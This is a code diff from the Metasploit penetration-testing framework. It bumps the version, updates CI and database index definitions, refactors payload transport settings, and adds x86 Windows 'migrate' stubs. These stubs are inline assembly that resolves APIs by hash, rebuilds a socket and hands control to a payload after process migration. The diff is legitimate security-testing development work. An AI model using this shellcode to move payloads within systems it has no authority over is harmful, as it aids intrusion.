Up to date

Author: wchen-r7

.travis.yml

@@ -1,9 +1,10 @@
+dist: trusty
 sudo: false
 group: stable
 bundler_args: --without coverage development pcap
 cache: bundler
 addons:
-  postgresql: '9.3'
+  postgresql: '9.6'
   apt:
     packages:
       - libpcap-dev

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.13.9)
+    metasploit-framework (4.13.10)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -14,7 +14,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.2.4)
+      metasploit-payloads (= 1.2.5)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.1.4)
       msgpack
@@ -169,7 +169,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.2.4)
+    metasploit-payloads (1.2.5)
     metasploit_data_models (2.0.10)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)

db/schema.rb

@@ -248,12 +248,12 @@
   add_index "metasploit_credential_cores", ["private_id"], name: "index_metasploit_credential_cores_on_private_id", using: :btree
   add_index "metasploit_credential_cores", ["public_id"], name: "index_metasploit_credential_cores_on_public_id", using: :btree
   add_index "metasploit_credential_cores", ["realm_id"], name: "index_metasploit_credential_cores_on_realm_id", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "private_id"], name: "unique_private_metasploit_credential_cores", unique: true, where: "(((realm_id IS NULL) AND (public_id IS NULL)) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "public_id", "private_id"], name: "unique_realmless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NULL) AND (public_id IS NOT NULL)) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "public_id"], name: "unique_public_metasploit_credential_cores", unique: true, where: "(((realm_id IS NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "private_id"], name: "unique_publicless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NULL)) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id", "private_id"], name: "unique_complete_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "private_id"], name: "unique_private_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "public_id", "private_id"], name: "unique_realmless_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "public_id"], name: "unique_public_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "private_id"], name: "unique_publicless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id", "private_id"], name: "unique_complete_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))", using: :btree
   add_index "metasploit_credential_cores", ["workspace_id"], name: "index_metasploit_credential_cores_on_workspace_id", using: :btree
 
   create_table "metasploit_credential_logins", force: :cascade do |t|

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "4.13.9"
+      VERSION = "4.13.10"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/payload/transport_config.rb

@@ -25,13 +25,10 @@ def transport_config_reverse_ipv6_tcp(opts={})
 
   def transport_config_bind_tcp(opts={})
     {
-      :scheme       => 'tcp',
-      :lhost        => datastore['LHOST'],
-      :lport        => datastore['LPORT'].to_i,
-      :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
-      :retry_total  => datastore['SessionRetryTotal'].to_i,
-      :retry_wait   => datastore['SessionRetryWait'].to_i
-    }
+      scheme: 'tcp',
+      lhost:  datastore['LHOST'],
+      lport:  datastore['LPORT'].to_i
+    }.merge(timeout_config)
   end
 
   def transport_config_reverse_https(opts={})
@@ -54,19 +51,26 @@ def transport_config_reverse_http(opts={})
     end
 
     {
-      :scheme       => 'http',
-      :lhost        => opts[:lhost] || datastore['LHOST'],
-      :lport        => (opts[:lport] || datastore['LPORT']).to_i,
-      :uri          => uri,
-      :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
-      :retry_total  => datastore['SessionRetryTotal'].to_i,
-      :retry_wait   => datastore['SessionRetryWait'].to_i,
-      :ua           => datastore['MeterpreterUserAgent'],
-      :proxy_host   => datastore['PayloadProxyHost'],
-      :proxy_port   => datastore['PayloadProxyPort'],
-      :proxy_type   => datastore['PayloadProxyType'],
-      :proxy_user   => datastore['PayloadProxyUser'],
-      :proxy_pass   => datastore['PayloadProxyPass']
+      scheme:      'http',
+      lhost:       opts[:lhost] || datastore['LHOST'],
+      lport:       (opts[:lport] || datastore['LPORT']).to_i,
+      uri:         uri,
+      ua:          datastore['MeterpreterUserAgent'],
+      proxy_host:  datastore['PayloadProxyHost'],
+      proxy_port:  datastore['PayloadProxyPort'],
+      proxy_type:  datastore['PayloadProxyType'],
+      proxy_user:  datastore['PayloadProxyUser'],
+      proxy_pass:  datastore['PayloadProxyPass']
+    }.merge(timeout_config)
+  end
+
+private
+
+  def timeout_config
+    {
+      comm_timeout: datastore['SessionCommunicationTimeout'].to_i,
+      retry_total:  datastore['SessionRetryTotal'].to_i,
+      retry_wait:   datastore['SessionRetryWait'].to_i
     }
   end
 

lib/msf/core/payload/windows/migrate.rb

@@ -0,0 +1,5 @@
+# -*- coding: binary -*-
+
+require 'msf/core/payload/windows/block_api'
+require 'msf/core/payload/windows/migrate_tcp'
+require 'msf/core/payload/windows/migrate_http'

lib/msf/core/payload/windows/migrate_common.rb

@@ -0,0 +1,49 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/block_api'
+
+module Msf
+
+###
+#
+# Not really a payload, but more a mixin that lets common functionality
+# live in spot that makes sense, so that code duplication is reduced.
+#
+###
+
+module Payload::Windows::MigrateCommon
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::BlockApi
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate(opts={})
+    asm = %Q^
+    migrate:
+      cld
+      pop esi
+      pop esi             ; esi now contains the pointer to the migrate context
+      sub esp, 0x2000
+      call start
+      #{asm_block_api}
+    start:
+      pop ebp
+    #{generate_migrate(opts)}
+    signal_event:
+      push dword [esi]    ; Event handle is pointed at by esi
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
+      call ebp            ; SetEvent(handle)
+    call_payload:
+      call dword [esi+8]  ; Invoke the associated payload
+    ^
+
+    Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
+  end
+
+end
+
+end
+

lib/msf/core/payload/windows/migrate_http.rb

@@ -0,0 +1,40 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/migrate_common'
+
+module Msf
+
+###
+#
+# Payload that supports migration over HTTP/S transports on x86.
+#
+###
+
+module Payload::Windows::MigrateHttp
+
+  include Msf::Payload::Windows::MigrateCommon
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'HTTP/S Transport Migration (x86)',
+      'Description' => 'Migration stub to use over HTTP/S transports via x86',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    # This payload only requires the common features, so return
+    # an empty string indicating no code requires.
+    ''
+  end
+
+end
+
+end

lib/msf/core/payload/windows/migrate_tcp.rb

@@ -0,0 +1,68 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/migrate_common'
+
+module Msf
+
+###
+#
+# Payload that supports migration over the TCP transport on x86.
+#
+###
+
+module Payload::Windows::MigrateTcp
+
+  include Msf::Payload::Windows::MigrateCommon
+
+  WSA_VERSION = 0x190
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'TCP Transport Migration (x86)',
+      'Description' => 'Migration stub to use over the TCP transport via x86',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86
+    ))
+  end
+
+  #
+  # Constructs the migrate stub on the fly
+  #
+  def generate_migrate(opts={})
+    %Q^
+    load_ws2_32:
+      push '32'
+      push 'ws2_'
+      push esp                  ; pointer to 'ws2_32'
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      call ebp                  ; LoadLibraryA('ws2_32')
+    init_networking:
+      mov eax, #{WSA_VERSION}   ; EAX == version, and is also used for size
+      sub esp, eax              ; allocate space for the WSAData structure
+      push esp                  ; Pointer to the WSAData structure
+      push eax                  ; Version required
+      push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+      call ebp                  ; WSAStartup(Version, &WSAData)
+    create_socket:
+      push eax                  ; eax is 0 on success, use it for flags
+      push eax                  ; reserved
+      lea ebx, [esi+0x10]       ; get offset to the WSAPROTOCOL_INFO struct
+      push ebx                  ; pass the info struct address
+      push eax                  ; no protocol is specified
+      inc eax
+      push eax                  ; SOCK_STREAM
+      inc eax
+      push eax                  ; AF_INET
+      push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+      call ebp                  ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
+      xchg edi, eax
+    ^
+  end
+
+end
+
+end
+

lib/msf/core/payload/windows/x64/migrate.rb

@@ -0,0 +1,5 @@
+# -*- coding: binary -*-
+
+require 'msf/core/payload/windows/x64/block_api'
+require 'msf/core/payload/windows/x64/migrate_tcp'
+require 'msf/core/payload/windows/x64/migrate_http'